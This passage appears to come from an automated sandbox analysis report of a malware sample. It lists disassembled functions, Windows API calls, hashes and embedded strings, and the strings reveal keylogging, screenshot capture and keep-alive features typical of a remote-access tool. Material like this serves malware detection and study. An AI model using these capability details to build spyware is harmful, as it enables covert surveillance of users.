                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A231C2353006065FDB2CCE79DDD445AB7E6FF842A03288A3DE587C7688D671F9418740
                                                                                                                                                                                                                                                                                                                              Function 00417BEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                                                                                                                              • API String ID: 1291196975-3785015651
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 867671ad2bd7bdec4e17951a99ce700f1927d2a65d9f843cc66d93939dd8d571
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 867671ad2bd7bdec4e17951a99ce700f1927d2a65d9f843cc66d93939dd8d571
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                                                                                                                                                                                                                              Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                                                                                                                                                                                                                              Function 1000A270 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b01bb7ab5e5c576250ddf7c738205e91cfded369ea80ce7225221d4f8e50cbfb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dd525ef8d7e77387af9de298a25bce4af4d3effd1b65662e93e4d60fb48b7d7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6321BF34608781DFE721CF1CC880B4ABBF4FB46690F604B5EF49687645C772AA8487A2
                                                                                                                                                                                                                                                                                                                              Function 00417CE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                                                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                                                                                                                                              • String ID: image/png
                                                                                                                                                                                                                                                                                                                              • API String ID: 1291196975-2966254431
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 64e5d7123867cf9f752f6fec38286026936923f7c169264016743af3ebd4b13b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1f40aeda14031b83fd9eea2ddee5e82f5a36372f8d90ac1696f7ac499827f772
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64e5d7123867cf9f752f6fec38286026936923f7c169264016743af3ebd4b13b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4621A135204211AFC300AF61CC88CAFBBBDEFCA755F10052EF90693151DB399945CBA6
                                                                                                                                                                                                                                                                                                                              Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                                                                                                              • API String ID: 481472006-1507639952
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6f0b25e7992d7fd90f44abc0ea64200ad5fbac3b1189d92a1ab3271e7756334e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0b25e7992d7fd90f44abc0ea64200ad5fbac3b1189d92a1ab3271e7756334e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                                                                                                                                                                                                                              Function 004336FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: LG$XG
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1482930923
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7c4b062fcb32332b9137c766d59a1203f687c3695f5e31fbe0a477c862ff6f2a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07110AB5D01714AACF20DFA998017CFB7A55F05725F14D16BEC18EB281D378EB408798
                                                                                                                                                                                                                                                                                                                              Function 028316AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                                                                                                              • String ID: : $Se.
                                                                                                                                                                                                                                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cd61224be4b05224aa5a5a11142734f159c9732ff75634346f7bbe8e9972362a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A11E7BA904248AECB11DFACD840BEDFBFDAF09714F144496E549E7211E7705A02CBA5
                                                                                                                                                                                                                                                                                                                              Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                                                                                                                                              • API String ID: 481472006-2430845779
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 365bcbfee3d565b8a38241e00ebfd453cc18cd437c04f7141d28498a3db00075
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 365bcbfee3d565b8a38241e00ebfd453cc18cd437c04f7141d28498a3db00075
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                                                                                                                                                              Function 004125EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                                                                                                                              • API String ID: 3660427363-3431404234
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b605368632a8b95eca07563d70a4edea7f82eb0f70db9b2c6bca89800abb1ac5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c735b93b908d9d71aa6a4d05a3740b5a2597980304af3aa5722c76a25f50973a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b605368632a8b95eca07563d70a4edea7f82eb0f70db9b2c6bca89800abb1ac5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201A2B6A00108BFEB04EB95DD46EFFBABDEF44240F10007AF901E2251E6B4AF009664
                                                                                                                                                                                                                                                                                                                              Function 00419E99 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EBE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: TUF$alarm.wav
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-147985980
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 51684589369e3c673a644f66e684fb8c42cd93cc6fa80ce3e9dee982dc441a3d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: dd13df65ec224498850e23f6f848d4e774319f78d5db457f3497a795ed38963e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51684589369e3c673a644f66e684fb8c42cd93cc6fa80ce3e9dee982dc441a3d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F301927060420166C604B676D866AEE77418BC1719F50413FF88A966E2EF7C9EC6C2CF
                                                                                                                                                                                                                                                                                                                              Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                                                                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                                                                                                                                                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2213c85c886e4de9ccc3d5eff7c09abaddf972785ca54a1a8fe73a7c66abb7d9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2213c85c886e4de9ccc3d5eff7c09abaddf972785ca54a1a8fe73a7c66abb7d9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                                                                                                                                                                                                                              Function 02831EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02832903
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028335D2: RaiseException.KERNEL32(?,?,?,02832925,00000000,00000000,00000000,?,?,?,?,?,02832925,?,028421B8), ref: 02833632
